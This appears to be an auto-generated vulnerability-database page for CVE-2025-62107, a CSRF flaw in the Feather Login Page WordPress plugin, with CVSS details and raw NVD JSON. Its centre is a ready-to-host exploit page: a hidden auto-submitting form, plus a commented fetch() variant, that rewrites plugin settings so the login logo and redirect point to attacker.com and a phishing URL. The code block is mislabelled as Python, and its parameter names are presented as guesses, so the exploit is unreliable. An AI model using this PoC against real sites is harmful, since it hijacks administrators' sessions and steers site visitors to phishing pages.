Security Vulnerability Report
中文
CVE-2025-62107 CVSS 4.3 MEDIUM

CVE-2025-62107

Published: 2025-12-22 10:16:01
Last Modified: 2026-04-23 15:34:33

Description

Cross-Site Request Forgery (CSRF) vulnerability in PluginOps Feather Login Page feather-login-page allows Cross Site Request Forgery.This issue affects Feather Login Page: from n/a through <= 1.1.7.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PluginOps Feather Login Page <= 1.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62107 --> <!-- Feather Login Page Plugin <= 1.1.7 --> <!-- This PoC demonstrates CSRF vulnerability in plugin settings --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-62107</title> </head> <body> <h1>CSRF Attack PoC for Feather Login Page</h1> <p>This page demonstrates the CSRF vulnerability in Feather Login Page plugin.</p> <!-- Auto-submit form that modifies plugin settings --> <form id="csrfForm" action="http://target-site/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Common Feather Login Page settings update parameters --> <input type="hidden" name="action" value="feather_login_settings"> <input type="hidden" name="feather_login_logo_url" value="https://attacker.com/malicious-logo.png"> <input type="hidden" name="feather_login_bg_color" value="#000000"> <input type="hidden" name="feather_login_redirect_url" value="https://attacker-site.com/phishing"> <input type="hidden" name="submit" value="Save Settings"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); // Alternative: Use fetch API for more stealthy attack /* fetch('http://target-site/wp-admin/admin-post.php', { method: 'POST', mode: 'no-cors', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=feather_login_settings&feather_login_logo_url=https://attacker.com/malicious-logo.png' }); */ </script> <p>If settings were modified successfully, the plugin configuration has been changed.</p> <p><strong>Note:</strong> This PoC is for educational and testing purposes only.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62107", "sourceIdentifier": "[email protected]", "published": "2025-12-22T10:16:00.873", "lastModified": "2026-04-23T15:34:33.310", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in PluginOps Feather Login Page feather-login-page allows Cross Site Request Forgery.This issue affects Feather Login Page: from n/a through <= 1.1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/feather-login-page/vulnerability/wordpress-feather-login-page-plugin-1-1-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}